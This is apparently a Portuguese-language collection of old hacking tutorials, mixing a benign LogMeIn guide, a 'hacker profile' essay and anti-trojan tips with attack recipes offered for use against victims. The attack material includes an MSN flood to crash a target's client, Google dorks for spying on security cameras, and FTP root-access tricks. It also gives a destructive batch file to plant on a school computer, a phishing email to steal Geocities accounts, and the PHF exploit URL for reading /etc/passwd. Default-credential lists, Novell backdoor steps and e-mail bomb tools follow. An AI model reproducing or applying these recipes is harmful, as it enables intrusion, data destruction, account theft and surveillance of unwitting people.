:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D

vai em ferramentas.....
opções....
mensagens...
desabilite os emoctions....do seu msn...

copie esses negocios aí em cima
e cole no seu msn
e mande para a vitima
sussesivamente

tipuh
umas 20x....

aí o msn dela trava
rsrsrs


espero ter ajudado

Assistência Remota (_Aprenda_)

De Cliente a Servidor e de Servidor a Cliente

Bom Galera... eu vou ensinar pra vocês a fazer conexão remota de cliente a servidor

1º Passo: nos vamos usar uma ferramenta remota muito famosa que é o LogMeIn

entre nesse site http://secure.logmein.com/ e registre-se no site
Lembrando: tem que ir no e-mail confimar o registro

2º Passo: após se registar no site ja está pronto e não será necessário baixar nada

3º Passo: Tipo assim... você vai passar a ser cliente

Agora você vai no PC que vai receber a assistência remota, entre no site: http://secure.logmein.com/ entre com o seu e-mail e senha e clique no link "Add Computer" você faz o download o pograma LogMeIn (4,54 MB) e instala, na instalação é importante deixar o mesmo nome do PC e a senha é importante que você não esqueça para você ter acesso remotamente!
Lembrando: o LogMeIn tem que tar ativado, o PC tem que tar ligado (Logico!) e conectado a internet

O esquema vai ser assim:

Seu PC: Cliente
PC que vai receber a assitencia remota: Servidor

4º Passo: No seu PC entre no site http://secure.logmein.com/ com seu e-mail e senha e escolha o PC, voce só controla ele se ele tiver online, vai em "Remote Control" e pronto. você tera acesso ao PC dele e assim podera dar assistencia remota necessária

Lembrando: Não use seu conhecimento para fazer mal de outra pessoa não use o conhecimento por divesão, mais sim por necessidade, lembrando isso é uma ferramenta de trabalho não um programa maldoso para acabar com o PC do outro use seu conhecimento para o bem, além do mais...

"O Conhecimento não é crime"

By: _Luan_ Espero que gostem

Aprenda aki a ver camera de segurança pelo google

o google é o melhor buscador q existe todo lamer como eu sabe disto...intum se vc usar a sequencia de comandos certos e conseguir filtrar bons resutados consegue coisas maravilhosas...e uma delas é essa ver camera de segurança...é so vc ir no google e colocar alguns desses comandos na barra de busca e dar a sorte de encontrar uma bela camera ligada pra vc fuxicar em seu BBB particular

inurl:ViewerFrame?Mode="

inurl:MUltiCameraFrame:?Mode="

inurl:view/index.shtml"

PERFIL TÍPICO DE UM HACKER

****************************************************************

Este profile reflete os comentarios detalhados de uma "pesquisa" feita com mais de
uma centena de correspondentes de USENET.

Hackers usualmente nao imitam uns aos outros. Por uma razao qualquer, o modo de
agir acaba ficando identico, como se todos fossem geneticamente iguais ou criados num
mesmo ambiente.
****************************************************************
Aparência Geral
****************************************************************
Inteligente. Escrutinador. Intenso. Abstraido. Surprendentemente para uma profissao
que e' sedentaria, a maioria dos hackers tende a ser magra; ambos os extremos sao
mais comuns que em qualquer outro lugar. Bronzeados sao raros.
****************************************************************
Forma de vestir
**************************************************************** Casual, vagamente pos-hippie; camiseta, jeans, tenis, sandalias ou pes descalcos.
Cabelo comprido, barbas e bigodes sao comuns. Alta incidencia de camisetas com
'slogans'(tipo va' ao teatro mas nao me chame, etc).
Uma minoria substancia prefere roupas 'de camping' --- coturnos, jaquetas militares e
etcs.
Hackers vestem para conforto, funcionalidade e problemas minimos de manutencao
ao inves de aparencia (alguns levam isso a serio e negligenciam higiene pessoal).
Eles tem um indice de tolerancia baixo a jaquetas e outras roupas de "negocios"; e'
ate' comun eles largarem um emprego ao inves de se conformar com uma roupa
formal.
Hackers do sexo feminino tenden a nunca usar maquiagem visivel. A maioria nao usa.
****************************************************************
Habitos de leitura
****************************************************************
Usualmente com grandes quantidades de ciencia e ficcao cientifica.Qualquer coisa
como 'American Scientific', 'Super Interessante', etc.. Hackers normalmente tem uma
capacidade de leitura de coisas tao diferentes que impressiona gente de varios
generos. Tem porem a tendencia a nao comentar muito isso. Muitos hackers gastam
lendo o que outros gastam assistindo TV e sempre manteem estantes e estantes de
livros selecionados em casa.
****************************************************************
Outros interesses
****************************************************************
Alguns hobbies sao bastante partilhados e reconhecidos como tendo a ver com
cultura: ficcao cientifica, musica, medievalismo (na forma ativa praticada por Grupos
que se isolam da sociedade e organizacoes similares) xadrez, go, gamao, jogos de
guerra e jogos intelectuais de todos os tipos. (RPG eram muito difundidos ate' virarem
cultura popular e explorados pela massa). Radio Amadorismo. Alguns ate' sao
linguistas ou fazem teatro.
****************************************************************
Atividade física ou esportes
****************************************************************
Muitos nao seguem nenhum esporte e sao anti-exercicio. Aqueles que fazem, nao
curtem bancar o espectador. Esporte seria algo que se faz, nao algo que se ve os
outros fazerem.
Tambem evitam esportes de grupo como se fossem a peste, com possivel excecao de
voleyball. Os esportes dessa raca sao quase sempre que envolvem competicao
individual e auto-superacao, ones involving concentration, stamina, and micromotor
skills: martial arts, bicycling, auto racing, kite flying, hiking, rock climbing, aviation,
target-shooting, sailing, caving, juggling, skiing, skating (ice and roller). Hackers'
delight in techno-toys also tends to draw them towards hobbies with nifty complicated
equipment that they can tinker with.
****************************************************************
Educação
****************************************************************
Quase todos os hackers acima da adolescencia sao portadores de diploma ou
educados ate' um nivel equivalente. O hacker que aprendeu sozinho e' sempre
considerado ( pelo menos para os outros hackers) como mais motivado, e pode ser
mais respeitado que o seu equivalente com o canudo. As areas incluem (alem da
obvia ciencia de computacao e engenharia eletrica) fisica, matematica, linguistica e
filosofia.
****************************************************************
Coisas que os hackers detestam e evitam
****************************************************************
IBM mainframes. Smurfs, Duendes e outras formas de "gracinhas". Burocracias. Gente
estupida. Musica facil de ouvir. Televisao. (exceto pelo velho "Star Trek" e os
"Simpsons"). Ternos. Desonestidade. Incompetencia. Chateacao. COBOL. BASIC.
Interfaces nao graficas.
****************************************************************
Religião
****************************************************************
Agnostica. Ateista. Judeu nao praticante. Neo-pagao. Mais comum, tres ou quatro
desses aspectos combinados. Crentes sao raros mas nao desconhecidos.

Invasão FTP

Vá ao MS-DOS e digite FTP , ao aparece o prompt ftp, digite OPEN, ira abrir um outro Prompt (to), digite o nome do host ou seu IP , Ex.: (to) ftp.convex.com.br Ao conectar ele pedira a senha e o Password, nao entre com seu e-mail nem com a sua senha se estiver hackeando o seu provedor!! NUNCA DIGITE NADA NO USERS E NO PASSWORDS No login precione ENTER, no password precione Novamente... Irá aparecer o prompt ftp, novamente..., ai é só digitar : quote user ftp , pressione ENTER e digite: quote cwd ~root Precione ENTER novamente e digite: quote pass ftp Pronto, vc esta Hackeando... Mas tem um porem..., se escrever a mensagem : user restriction aplly, vc não esta Hackeando.., pois esta aplicada a proteção..., para isto tente com outro user tipo quote cwd ~sys e os outros da lista UNIX.... Ao entrar vc vai estar no Diretório do login, Ex.: homeroot Para ver a lista de users vc volta um dir vá para o dir home e cada dir é um usuário,... tente pegar as senhas ,mais pegando as senhas a outro porem, ela são todas cryptografadas!Pegue vc mesmo um descrypto e pronto!!!

Invasão FTP

Vá ao MS-DOS e digite FTP , ao aparece o prompt ftp, digite OPEN, ira abrir um outro Prompt (to), digite o nome do host ou seu IP , Ex.: (to) ftp.convex.com.br Ao conectar ele pedira a senha e o Password, nao entre com seu e-mail nem com a sua senha se estiver hackeando o seu provedor!! NUNCA DIGITE NADA NO USERS E NO PASSWORDS No login precione ENTER, no password precione Novamente... Irá aparecer o prompt ftp, novamente..., ai é só digitar : quote user ftp , pressione ENTER e digite: quote cwd ~root Precione ENTER novamente e digite: quote pass ftp Pronto, vc esta Hackeando... Mas tem um porem..., se escrever a mensagem : user restriction aplly, vc não esta Hackeando.., pois esta aplicada a proteção..., para isto tente com outro user tipo quote cwd ~sys e os outros da lista UNIX.... Ao entrar vc vai estar no Diretório do login, Ex.: homeroot Para ver a lista de users vc volta um dir vá para o dir home e cada dir é um usuário,... tente pegar as senhas ,mais pegando as senhas a outro porem, ela são todas cryptografadas!Pegue vc mesmo um descrypto e pronto!!!

Hackeando sua escola

Este texto irá ensinar, de modo fácil, destruir o computadorzinho da sua escola (ou de amigo, trabalho, etc.).
Primeiro, crie em seu computador um arquivo de lote (nem precisa compilar), se não souber aí vai, pelo DOS digite:
copy con arquivo.bat ENTER
@echo off ENTER
@echo Frase de sua preferência ENTER
del *.sys ENTER
del *.exe ENTER
del *.com ENTER
cd windows ENTER
del *.* ENTER
cd\ ENTER
del arquivo.bat ENTER
@echo Frase de sua preferência ENTER
Aperte F6 ENTER
Pronto, um arquivo vírus de lote foi criado em seu computador, ele não fará nada contanto que você não digite "arquivo" no diretório onde ele está.
Remova este arquivo (arquivo.bat) para um disquete, junto a ele um "Autoexec.bat", com a linha de comando: C:\arquivo.bat.
Agora é com você! Leve o disquete para a escola (trabalho, casa de amigo, etc.) e quando tiver uma oportunidade, insira o disco na unidade referente (geralmente a:) e copie os arquivos para o diretório C:\. Pronto! Retire o disco e diga tchau.

hackeando geocities

Olha, é um jeito muito IDIOTA, mas em todo caso, tente. O geocities tem um pequeno bug e através dele nós vamos fazer a festa!!!
Uma vez, criei uma página no Geocities (que deve estar abandonada até hoje). Quando eu recebi o e-mail delas indicando que eu me associei e tudo mais, eles só me falaram o meu username e o endereço que eu estava (ex: BAIRRO/NUMERO). Eles não me deram a senha. Por isso que eu acho o Geocities uma bosta.
Vamos lá: Anote um endereço geobost..., ops..., geocities que você quer "pegar" (ex: Pentagon/3333). Anote junto o username da pessoa que está com o endereço. (ex: mike). Tente explorar os neighborhoods do geocities para achar. Tente pegar uma página recente.
Agora entre no help do geocities e envie um e-mail anônimo (use o e-mail da pessoa) para eles explicando que você não recebeu a senha e que o seu email está com problemasl. Olha, se eles forem idiotas o bastante para cair nessa, comemore! Se você não sabe inglês, use esse texto. Substitua as partes destacadas pelo devido texto. Boa sorte!
Dear geocities,
Until now, I haven't recieved my password and I can't work in my web site. Please re-send the passaword to me. I tried many times to use the password lookup but I didn't get my password. Also my e-mail is having some problems. Please re-send the password to seu e-mail. My name is username da pessoa . My neigborhood is endereço Bairro/numero

Hackeando FTP

Existem varios Programas de FTP'S, se não quizer saber de ftp porra nehuma use o do DOS!!! Vá ao Prompt e digite FTP, ao aparece o prompt ftp>, digite OPEN, ira abrir um outro Prompt , digite o nome do host ou seu IP, tipo ftp.mandic.com.br. Ao conectar ele pedirá a senha e o Password, tente usar os passwords UNIX, se não der, vc deve entrar INVISIVEL. Veja abaixo:
No login precione ENTER
No password precione ENTER
Irá aparecer novamente o prompt ftp> , ai é só digitar:
quote user ftp
quote cwd ~root
quote pass ftp
Pronto, vc esta Hackeando... Mas tem um porém..., se escrever a mensagem: user restriction aplly, vc não está Hackeando.., pois está aplicada a proteção..., para isto tente com outro user tipo quote cwd ~sys e os outros da lista UNIX....

ATENÇÃO!!!

Não tente Hackear usando o "user normal" de FTP'S, que é login: anonymous e password: seu E-Mail, pois vai ser aplicado a proteção....
MEU DEUS, EU ENTREI E AGORA O QUE FAÇO???
Ao entrar vc vai estar no Diretorio do login, tipo \home\root\,
Dai, para ver a lista de users vc volta um dir vá para o dir \home\
e cada dir é um usuario,... não tentem pegar as senhas , pois são Cryptografadas... Pois a maioria dos users usa a mesma senha login....
Ok... se vc não sabe os comandos, ai vai a dica...., se vc estiver no MS-DOS, digite ? e tecle ENTER em qualquer lugar, pois irá aparecer os comandos... e ai é só Hackear !!! Não fique mais que 5 Min em um servidor, pois ele caçara seu IP, e seu login, e vai ser CADEIA !!!

COMO FICAR ANONIMO

Quando você for fazer alguma atitude hacker, é fundamental estar anônimo, ou seja, estar com seu endereço IP (Internet Protocol) anônimo, é como ficar "invisível". Para isso, existe um serviço muito barato e fácil de ser usado, o Anonymizer, que faz o mesmo papel do spoof.Para utilizar, é muito simples, basta digitar http://www.anonymizer.com:8080/ e o endereço á ser acessado anônimamente. Se você for acessar anônimamente o ZAZ por exemplo, ficará assim: http://www.anonymizer.com:8080/http://www.zaz.com.brMaiores informações sobre o Anonymizer em

Cavalos de Tróia

1. Saiba o que são os cavalos de TróiaCavalos de Tróia são programas que vem escondidos dentro de outros sem que o usuário saiba de sua existência. Eles podem permitir que outra pessoa obtenha controle sobre a máquina de um internauta conectado à Internet.Atualmente, o recursos tem sido amplamente utilizado para invadir máquinas conectadas à Internet. A tática é simples: mandar um programa qualquer (protetores de tela ou animações engraçadinhas, por exemplo), que na verdade contém inserido um outro que dá ao hacker acesso remoto à máquina onde o cavalo de Tróia foi instalado. Esses softwares são verdadeiras portas de acesso ao conteúdo do computador.Os Cavalos de Tróia permitem que outra pessoa obtenha controle sobre a máquina do usuário, através do protocolo TCP/IP da Internet. Testes demonstraram que o administrador remoto é capaz de acessar dados e efetuar tarefas com mais eficiência do que o próprio usuário que está em frente à máquina.
2. Conheça os programas Back Orifice, Netbus, Sockets de Tróie e outrosEntre os principais troianos estão o Back Orifice (BO), que se instala em micros que rodam o Windows 95/98, o NetBus, capaz de rodar também no Windows NT, o Master's Paradise 98 e o Sockets de Troie (ST). Todos apresentam características semelhantes: permitem administração remota, revelam as senhas contidas no sistema operacional do usuário e mostram em tempo real tudo aquilo que é digitado.
3. Dicas para evitar a invasão de seu micro- Proteja e troque a sua senhaO controle deve começar pela identidade digital do usuário. User e senha são identificações particulares que merecem o máximo cuidado e sigilo. Com certeza, ninguém gostaria de compartilhar a sua senha bancária ou o número do seu cartão de crédito com mais alguém. O mesmo deve acontecer com a sua senha de acesso.A troca periódica da senha é um bom começo para quem não quer dar chance ao azar. A maioria dos provedores de acesso oferece esse serviço online. Para maior segurança, o usuário deve utilizar senhas relativamente complexas. No mínimo, utilize uma senha alfanumérica com 6 caracteres. Mantenha o hábito de conferir o extrato detalhado da utilização da sua conta de acesso. Ao notar qualquer alteração no número de horas utilizadas, entre em contato com administração do seu provedor.Isso evita alguns problemas, mas não funciona se o seu computador já tiver um cavalo de Tróia instalado. Isso porque alguns desses programas permitem ao hacker roubar a sua senha do seu próprio micro. Nesse caso, é necessário desinstalar o troiano de sua máquina, antes de mais nada. Para saber se há algum cavalo de Tróia instalado em sua máquina, você precisa de um programa detector.
- Não execute programas de origem duvidosaAntes de mais nada, para evitar que a sua máquina seja vítima de um ataque deste tipo, recomendamos que você pense duas vezes entes de rodar qualquer arquivo executável (qq_coisa.exe) encontrado na rede ou recebido por e-mail. Mesmo que você receba um executável de um conhecido ou amigo, procure saber antes a procedência do mesmo.
- Seja cauteloso com o IRC e ICQMuitos dos programas de IRC tem bugs conhecidos que permitem aos usuarios enviar executáveis para outros, em certas circunstâncias. Não aceite programas (jogos, screensavers etc.) recebidos via IRC porque não há como saber quem o está enviando, e também nunca se deve deixar o IRC aceitando automaticamente transmissões de arquivos ou executando scripts. As mesmas precauções valem para o ICQ. Não acredite em noticias recebidas ao acaso dizendo coisas como "use este programa para atualizar seu ICQ" ou "rode este patch para proteger seu Explorer" etc. Se receber algo assim, confira sempre as notícias no site do fabricante do software em questão.
- Atualize o seu navegador periodicamenteAlém da troca de senha, o usuário precisa manter seus softwares sempre atualizados. Tanto o navegador da Netscape quanto o da Microsoft (Internet Explorer) já apresentaram bugs de segurança em quase todas as suas versões. Tão logo estes bugs são descobertos, as respectivas fabricantes oferecem patches de correção para os problemas. Visitas regulares ao site da fabricante do seu navegador preferido o ajudarão na coleta de informações sobre os bugs e suas respectivas correções.
4. Copie programas para se defenderPara evitar que a sua máquina seja vítima do ataque de um hacker utilize um Firewall,

ataque a provedores via browser

O ataque via browser é um dos ataques mais faceis de executar, mas não dá nem 50% de sucessos nos ataques. Vou tentar explicar como você usa esse metódo:
Primeiramente você tem que entender o que está fazendo, não adianta selecionar a dica aperta CTRL+C e colocar no navegador achando que ele vai fazer tudo para você não, entenda:
Bom, como já sabe o geralmente o arquivo "passwd" é o que contém os passwords encripitados (se você nao sabe ainda, dá um olhada na seção "SISTEMA UNIX"), existem vários servidores que só Root pode entrar no diretório "/etc", para outros usuarios é bloqueado o acesso a esse diretório, mas existe um método para tentar pegar esse arquivo. No diretório /cgi-bin do Web Server (Pagina WEB do servidor) geralmente contém um arquivos chamdo PHF. O PHF permite aos usuários ganhar acesso remoto para arquivos (inclusive o /etc/passwd). Então através desse arquivo você pode tentar pegar a lista de passwords, é muito simples, apenas digite essa URL no seu browser: http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Então substitua o "xxx.xxx.xxx" pelo endereço do servidor que você quer hackear.
Ex: http://www.tba.com.br/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Bom, mas se você usar um pouco a cabeça vai ver que para que não de nada errado e você pode usar o anonymizer (Se você não ainda o que é o anonymizer, dá uma olhada na seção Anônimo), bom não é certeza que dá pra usar não porque eu nunca tentei, mas pela lógica dá.

Apostila Hacker

'Nesta apostila você vai aprender :
Password do BIOS Password do Windows Password do screen saver do Windows Proteção de documentos do Word Proteção de arquivos ZIP Proteção de arquivos ARJ Copiando digitações ou macros de um micro Um editor hexadecimal Escondendo informações
Bios Password
Para quebrar o password do BIOS você pode encontrar duas situações:
1- Se você pegar o computador depois que o password foi passado corretamente, use um desses programas:
amipsw.com (230b) ami.com (555b) aw.com (1,83k) amidecod.com (1,79k)
2- Se você pegar o computador desligado ou esquecer o password:
- Ligue o micro e entre o setup; - Anote TODOS os dados em um papel; - Desligue e abra a CPU; - Ache uma bateria na motherboard e retire-a; - Espere uns 20 minutos e recoloque a bateria; - Ligue o micro novamente e entre no setup; - Re-configure todos os dados que você anotou.
Password do Windows
Para quebrar o password do Windows 3.x você deve digitar"ctrl+alt+del" e depois "enter" quando aparecer a caixa de verificação. Depois que você passou o password, edite o arquivo win.ini e apague as linhas "load=" e "run=".
Para quebrar o password no WIN95:
1 - Se a caixa de verificação que aparecer for Password Logon, simplesmente clique em cancel que o sistema vai entrar.
2 - Se a caixa de verificação for Windows Password, digite"ctrl+alt+del", escolha a janela do password na lista que aparecerá e clique em "End Task". Com o password passado, edite o arquivo win.ini e apague as linhas "load=" e "run=".
Screen Saver Password
Para retirar o password de Screen Saver do Windows 3.x você deve editar o arquivo control.ini, apagando tudo o que tiver na area do password. Para retirar o password do Screen Saver do WIN95, renomeie todos os arquivos de extensão .pwl do diretório do windows. Anote os nomes alterados em um papel para eventuais problemas.
DICA :
Para desligar o screen saver sem ter o password no win 3.1 (ainda não foi testado no 3.11 ou no WIN95), aperte ctrl+alt+del e enter várias vezes que o screen saver é fechado.
Proteção de Documentos Word
Para retirar a proteção dos documentos do word use esse programa:
wfwcd.zip (19,8k)
Password do ZIP
Para quebrar o password de arquivos ZIP use esse programa:
zipcrack.zip (12,3k)
Password do ARJ
Para quebrar o password de arquivos ARJ use esse programa:
brkarj10.zip (13,1k)
Copiando Digitações
Para copiar teclas digitadas de um micro como passwords ou logins use um desses programas:
keycopy.zip - DOS - (3,31k) keytrap.zip - WIN95 - (36,0k)
Hexadecimal
Para quebrar alguns pogramas, passwords ou códigos de entrada, é bom que você tenha em mãos um bom programa editor de hexadecimal. Ele tamb;em é utilizado para remover os numeros seriais de programas como ACDSee 9.0 e etc...
Hex Workshop 32bits (375k)
Escondendo Informações
Para esconder informações ou até pequenos arquivos em arquivos de imagem do tipo .GIF , use esse programa:
Hide and Seek v. 4.1 (82,5k)
Hack Modem
Encontrando o sistema Sistemas UNIX Sistemas VAX/VMS Sistemas PRIME Rede Novell Passwords muito utilizados E-mail
Encontrando o Sistema
Para encontrar um computador com o sistema, você deve procurar pelas linhas com um programa chamado War Dialer, ou se conectar via Telenet ou outro sistema de interligação de computadores.
War Dialer: VMB Hacker (40,7k)
Sistemas UNIX
1. Entrando no sistema - Para entrar no sistema, você deve entrar com um "login", que pode ter de 1 a 8 dígitos e um password que pode ter de 6 a 8 dígitos. Dai você tem três saídas:
1. Arrumar a lista de passwords com um hacker 2. Tentar entrar com os defaults 3. Ver quem está on-line com os comandos: who, rwho, finger; e tentar entrar com seus logins mais tarde.
Defaults são logins e passwords que já vem com o sistema. Eles ficam residentes até que o sysop o desliguem, então você pode dar a sorte de encontrar um esquecido. Veja lista abaixo.
Login: Password:
root root root system sys sys sys system daemon daemon uucp uucp tty tty test test &nbs p; test bin bin adm adm adm admin admin adm admin admin sysman sysman sysman sys sysman system sysadm sysadmin sysadmin sys sysadmin system sysadmin admin sysadmin adm who who learn learn uuhost uuhost guest guest host host nuucp nuucp rje rje games games games player sysop sysop root sysop demo demo
2. Dentro do sistema: Dentro do sistema, a primeira coisa que você deve fazer é copiar o arquivo da lista de passwords. Ele se está em: /etc/passwd. Nesse arquivo, você vai encontrar as informações na seguinte sintaxe:
username:password:UserID:GroupID:descrição ou nome:homedir:shell
Ex.: fou:234abc56:7148:34:Fausto Morais:/home/dir/fou:/bin/fou
Username: fou Encrypted Password: 234abc56 User Number: 7148 Group Number: 34 Other Information: Fausto Morais Home Directory: /home/dir/fou Shell: /bin/fou
Esse arquivo muito provávelmente estará encriptado. O password estará escondido e, sem um programa para decriptá-la, a lista será inútil. O programa de decriptação do password UNIX, trabalha em cima de um dicionário pré moldado, comparando as palavras com o texto encriptado. É bom lembrar que o Brute Force não irá decriptar a lista. Ele irá tentar comparar palavras encriptadas por uma lista de nomes com a lista de passwords. Quando ele encontrar semelhanças (ex. duas palavras igusia com a mesma decriptação) ele para e dá a lista pronta.
Brute Force (14,4k) Dictionary Maker (7,73k)
Antes de usar o programa decriptador que não dá certeza de sucesso, tente encontrar um login sem password pois assim, você só precisará digitar o login para entrar no sistema. Ex.:
fou::7148:34:Fausto Morais:/home/dir/fou:/bin/fou
Depois da lista de passwords, pegue os seguintes arquivos:
/etc/group - É a lista de newsgroups e seus passwords também encriptados. sintaxe - groupname:password:group id:users in group
/etc/hosts - É a lista de hosts conectados ao sistemas. Útil quando a conexão é via telnet ou rlogin.
/usr/mail/ - É onde estão guardadas as mensagens de cada usuário.
Sistema VAX/VMS
Para entrar no sistema VAX/VMS, você deve proceder da mesma maneira que fez no UNIX: Arrume a lista de passwords, entre com o login de alguém ou tente os defaults.
Username: Password:
system operator system manager system system system syslib operator operator systets uetp systest systest systest test sysmaint sysmaint sysmaint service sysmaint digital field field field service guest guest guest sem password demo demo demo sem password test test decnet decnet
Dentro do sistema não há muito o que fazer. Você pode tentar pegar a lista de passwords em: SYS$SYSTEM:SYSUAF.DAT, mas normalmente, ela não está disponível para os usuários.
Tome muito cuidado quando tentar quebrar o sistema VAX's, pois ele guarda todos os bad logins e bad passwords, podendo rastreá-lo na sua próxima tentativa. Se você quiser mesmo tentar, entre com alguns passwords em um dia, espere e tente novamente no dia seguinte...
Sistema PRIME
Para entrar no sistema PRIME você deverá fazer as mesmas coisas que fez no UNIX e no VAX's.
Username: Password:
prime prime primos primos primos prime primos_cs prime primos_cs primos primenet primenet system system system prime system primos netlink netlink test test guest guest guest1 guest
Rede Novell
1. Entrando no Sistema - Para quebrar a rede Novell você deve utilizar os mesmos recursos que usou para entrar nos sistemas UNIX ou VAX's. Na Novell você também pode tentar alguns defaults. Os defaults da rede Novell são usados para a conexão com portas externas como impressoras, fax e etc..., todos sem password. Abaixo estão alguns defaults:
Login:
superisor guest admin user_template print laser hp_laser printer laserwriter post mail gateway gate router backup wangtek fax faxuser faxworks test archivist chey_archsvr windows_passthru
Se você conseguir entrar com esses defaults, você pode conseguir a lista com os logins verdadeiros fazendo o seguinte: vá ao diretório SYS:PUBLIC, digite SYSCON e dê enter. Então vá a User Information e veja a lista com todos os logins desse servidor. Esses logins só poderão ser utilizados se estiverem sem password, pois a lista só mostra os nomes. Nunca tente chutar o password de um usuário, pois o computador armazena o numero de vezes que uma senha foi digitada errada e manda para o usuário verdadeiro quando ele se conecta. Esse sistema de segurança se chama Intruder Detection. Se você não conseguir entrar com esses logins, faça o seguinte: no prompt do DOS digite NETX ou VLM, para rodar a rede TSRs e escreva CX /T /A /R. Com isso você, provavelmente conseguirá a lista dos usuários.
2. Conseguindo Supe Acess - Para conseguir um acesso Supervisor, que é muito importante para fazer uma backdoor ou utilizar outros recursos use esse programa:
nw-hack.zip (25,8k)
Os problemas de usar o nw-hack são os seguintes: O password Supervisor é mudado para SUPER_HACKER; Todas as contas no servidor tem acesso Supervisor; o administrador do sistema logo saberá que você entrou na rede e acabará com os previlégios do acesso Supervisor mudando também seu password. A única coisa que você pode fazer é deixar uma backdoor ou "porta dos fundos".
3. Deixando uma Porta dos Fundos - Uma porta dos fundos com previlégios de acesso Supervisor é como uma assinatura grátis. Para fazer isso, você deve utilizar o seguinte programa:
super.zip (31,3k)
Esse programa foi escrito exatamente para deixar o usuário desligar e ligar o acesso Supervisor na hora que quiser. Faça então o seguinte:
Consiga aceso Supervisor com o nw-hacker; Ligue sua conta para supe equivalency com o super.exe; Se você ganhar acesso Supervisor, dê supe equivalency a algum dos defaults (Guest, test, archivist, chey_archsvr...); Saia e entre na rede com o default que você deu a supe equivalency e ligue o acesso Supervisor com o super.exe; Saia e entre novamente com o login que você utilizou primeiro; Remova o acesso Supervisor.
Agora o default que você escolheu pode ser ligado e desligado por você, na hora que você quiser para ter acesso Supervisor.
E-mail
Nesta sessão você encontrará arquivos para enviar e-mails bombas, e-mail sem remetente e os famosos PGPs.
Unabomb (59,9k) Para bombear o e-mail de alguém. Upyours 3.0 (+-2Mb) Link para o melhor programa de e-mail bomb Anonimail (71,3k) Para enviar e-mails anônimos AEgis Shell for PGP (2,6Mb) Link para um dos melhores programas de encriptação
Se você quiser enviar um E-Mail para Usenet, mande a mensagem para @, por exemplo.
Grupo: fou.morais Gateway: news.demon.co.uk Endereço: fou.morais@news.demon.co.uk
Abaixo está uma lista com alguns gateways:
group.name@news.demon.co.uk group.name@charm.magnus.acs.ohio-state.edu group.name@undergrad.math.uwaterloo.ca group.name@nic.funet.fi group.name.usenet@decwrl.dec.com
Para escrever essa sessão, foram tomados como base os seguintes documentos: The PC Hacking FAQ Por: Olcay Cirit BASIC NETWORKING Por: Sk8 The SkinHead alt.2600 FAQ, Beta 013 Por: Vários Autores